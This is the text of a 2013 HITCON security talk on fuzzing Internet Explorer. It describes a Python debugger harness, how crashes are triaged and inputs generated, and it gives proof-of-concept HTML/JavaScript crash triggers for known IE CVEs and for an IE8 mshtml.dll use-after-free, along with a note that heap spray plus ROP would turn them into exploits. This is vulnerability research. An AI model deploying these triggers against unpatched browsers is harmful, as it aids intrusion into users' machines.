0-Day 甘苦談 (0-Day WTF Talk) Happy Fuzzing Internet Explorer HITCON

0-Day 輕鬆談 (0-Day Easy Talk) Happy Fuzzing Internet Explorer 2013/07/19 @ HITCON <Orange@chroot.org>

0-Day 甘苦談 (0-Day WTF Talk) Happy Fuzzing Internet Explorer 2013/07/19 @ HITCON <Orange@chroot.org>

這是一場簡單的演講 This is an Easy Talk

分享一些我的 Fuzzing 心得 Share Some Fuzzing Review of Mine

以及很順便的丟個 0-Day 出來 And Disclosed a 0-Day in Passing

大家好 Hello, Everyone

我是 Orange This is Orange Speaking

現任大學生 I am a College Student, Now

CHROOT.org 成員 Member of CHROOT.org

DevCo.re 打工中 Part-Time Work at DevCo.re

揭露過一些弱點 Disclosed Some Vulnerabilities cve 2013-0305 cve 2012-4775(MS12-071)

About Me 蔡政達 aka Orange 2009 台灣駭客年會競賽冠軍 2011, 2012 全國資安競賽金盾獎冠軍 2011 東京 AVTOKYO 講師 2012 香港 VXRLConf 講師 台灣 PHPConf, WebConf, PyConf 講師 專精於 駭客攻擊手法 Web Security Windows Vulnerability Exploitation

如果對我有興趣可以到 blog.orange.tw If You are Interesting at Me. You Can Visit blog.orange.tw

我專注於 Web Security & 網路滲透 I Focus on / Interested in Web Security & Network Penetration

但今天來聊聊 0-Day 以及 Fuzzing ( 不是我專門的領域 QQ) But Today Let's Talk About 0-Day and Fuzzing (I am Not Expert in This, But Just Share)

Conference-Driven 0-Day n. 名詞 釋義 : 為了研討會生 0-Day

在找 0-Day 中的一些筆記 Some Notes in Finding 0-Day

這次我們討論 IE This Time We Talk About IE

http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zerodays-an-price-list-for-hackers-secret-software-exploits/

Hacker's Good Friend

方法 White Box Code Review (IE5.5 Source Code) 二話不說丟進 IDA Black Box Fuzzing

Fuzzing Garbage in Garbage out 理論上可以找到所有漏洞 前提是你有無限的時間

時間越多, 0-Day 越多 - 貝拉克. 歐巴 馬

Fuzzing Model Generator Logger Result Debugger

http://youtube.com/watch?v=m7xg-ynmise

Debugger Windows Debug API DebugActiveProcess WaitForDebugEvent ContinueDebugEvent 好麻煩 快速 客制化的 Debugger

PyDBG A Pure Python Windows Debugger Interface

Debug a Process >>> import pydbg >>> dbg = pydbg() >>> dbg.load( file ) # or dbg.attach( pid ) >>> dbg.run()

Set Breakpoint >>> dbg.bp_set( address, callback ) >>> dbg.set_callback( exception_code, callback )

Memory Manipulation >>> dbg.read( address, length ) >>> dbg.write( address, length )

Crash Dump Report >>> bin = utils.crash_binning.crash_binning() >>> bin.record_crash( dbg ) >>> bin.crash_synopsis()

Logger (Filter) 滿山滿谷的崩潰 不是所有的 Crash 能成為 Exploit 九成以上是 Null Pointer 只能當 DoS 用 mov eax, [ebx+0x70] ; ebx = 0 EIP Disassemble jmp reg call reg call [reg + CONST] Stack SHE Chain

EIP = ffffffff!!?

0x50000 = 327680 = (65535 / 2)*10 The Value 65535 We Can Control

File Generator The Most Important Part of Fuzzing

File Generator 內容越機歪越好, 當然還是要符合 Spec 熟讀 Spec 熟悉 File Structure 想像力是你的超能力

Fuzzing 方向 1) 找新型態弱點 ( 麻煩但可通用 ) 2) 找已知型態弱點 ( 快速但有針對性 )

新型態弱點 試試比較新 或比較少人用的 HTML5 Canvas SVG VML cve-2013-2551 / VML Integer Overflow / Pwn2own / VUPEN WebGL IE11 Begin to Support

已知型態弱點 研究以往的弱點我們可以知道 Internet Explorer is Not Good at Parsing DOM Tree Parsing <TABLE> with <TR> & <TD> Parsing <TABLE> with <COL> CTreeNode & CTableLayout

Pseudo Scenario of Use-After-Free 1. <foo> 2. <bla id=x> 3. <bar id=y> 4. 5. </bar> 6. </bla> 7. </foo> 1. <script> 2. var x = document.getelementbyid( 'x' ); 3. var y = document.getelementbyid( 'y' ); 4. x.innerhtml = 'AAAA '; 5. y.length = 100px; 6. </script>

Ex: CVE-2011-1260 (Not Full Version) 1. <body> 2. <script> 3. document.body.innerhtml += "<object >TAG_1</object>"; 4. document.body.innerhtml += "<aid='tag_3' style=' '>TAG_3</a>"; 5. document.body.innerhtml +="AAAAAAA"; 6. document.body.innerhtml += "<strong style=' '>TAG_11</strong>"; 7. </script> 8. </body>

Ex: CVE-2012-1876 (Heap Overflow) 1. <script> settimeout("trigger();",1); </script> 2. <TABLE style="table-layout: fixed; "> 3. <col id="132" width="41" span="1" > </col> 4. </col> 5. </TABLE> 1. function trigger() { 2. var obj_col = document.getelementbyid("132"); 3. obj_col.width = "42765"; 4. obj_col.span = 1000; 5. }

Fuzzing with DOM Tree Using DOM Methods to Manipulate Objects CreateElement removechild appendchild InnerHTML outertext createrange addeventlistener select https://www.facebook.com/zztao

Putting All Together 1) Randomize HTML Node for Initial 2) Manipulated Nodes with DOM Method ( Can Also Play with CSS at the Same Time)

運氣不好, 是 人品問題 - 貝拉克. 歐巴 馬

Generally, Single Machine Run Can Find 1 or 2 IE 0-Day in a Month I Have Successfully Found 0-Days from IE6 to IE9, For IE10+ I Haven't Tried Because I am Too Lazy : (

So I Found a 0-Day For HITCON 1) Work on Internet Explore 8 2) Mshtml.dll 8.0.6001.23501

http://www.zdnet.com/ie8-zero-day-flaw-targets-u-s-nuke-researchers-all-versionsof-windows-affected-7000014908/

WinXP 還能再戰十年

Proof-of-Concept

<html> <script> var x = document.getelementbyid('eee'); x.innerhtml = ''; </script> <body> <table> </table> </body> </html>

Microsoft is Our Sponsor I Can't Say More Detail Until Patched : (

Call Stack

call edx (e10.950): Access violation - code c0000005 (!!! second chance!!!) eax=3dbf00a4 ebx=0019bb30 ecx=037f12c8 edx=085d8b53 esi=0172b130 edi=00000000 eip=085d8b53 esp=0172b100 ebp=0172b11c iopl=0 zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 085d8b53????? nv up ei pl

Writing Exploit Windows Protection DEP Luckily If Windows XP We Don't Care About ASLR Luckily It is Not IE10+ that It Hasn't vtable Guard

So, Writing Exploit is Easy Heap Spray + ROP Enough

Demo

http://youtube.com/watch?v=qwkkfucq_va

本來故事到這有個美滿的結局 Originally, This Story Have a Happy Ending

But 人生最精彩的就是這個 But

0-Day 在 HITCON 前一週被修掉了 Silent Fixed Before a Week of HITCON

What the

Proof-of-Concept 1. <!DOCTYPE html> 2. <table> 3. <tr><legend><span > 4. <q id='e'> 5. <a align="center"> <th> O </th> </a> 6. </q> 7. </span></legend></tr> 8. </table> 9. </html> 1. window.onload = function(){ 2. var x = document.getelementbyid('e'); 3. x.outertext = ''; 4. }

Work on mshtml.dll # mshtml.dll... # 2013 / 05 / 14 mshtml.dll 8.0.6001.23501 # 2013 / 06 / 11 mshtml.dll 8.0.6001.23507 # 2013 / 07 / 09

Reference VUEPN Blog http://www.vupen.com/blog/ Paimei https://github.com/openrce/paimei Special Thank tt & nanika

Thanks <Orange@chroot.org>